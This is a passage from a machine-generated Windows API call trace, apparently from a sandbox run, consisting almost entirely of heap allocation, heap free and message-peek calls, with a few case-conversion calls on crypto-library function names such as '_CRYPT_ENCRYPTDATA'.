lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.044] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1271) returned 0x7c9968 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9968 | out: hHeap=0x770000) returned 1 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.044] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0034.044] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.044] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da258 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1271) returned 0x7c9968 [0034.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1d8 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0034.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da318 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da178 [0034.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da178 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da248 [0034.045] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cda8 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0034.045] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1271) returned 0x956298 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0034.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1cd8 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1800 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16c0 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0034.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0034.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0034.046] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0034.046] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.046] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da268 [0034.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.047] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0034.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0034.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1760 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da308 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0034.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a30 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0034.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0034.047] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da398 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0034.047] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae988 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0034.047] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0034.048] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da298 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da298 | out: hHeap=0x770000) returned 1 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da298 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0034.048] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.048] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.048] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3a8 | out: hHeap=0x770000) returned 1 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da398 | out: hHeap=0x770000) returned 1 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0034.049] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889970 | out: hHeap=0x770000) returned 1 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0034.049] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0034.049] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0034.049] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.050] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0034.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0034.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0034.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0034.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0034.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897c0 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0034.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0034.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.050] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0034.050] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0034.051] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0034.051] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: 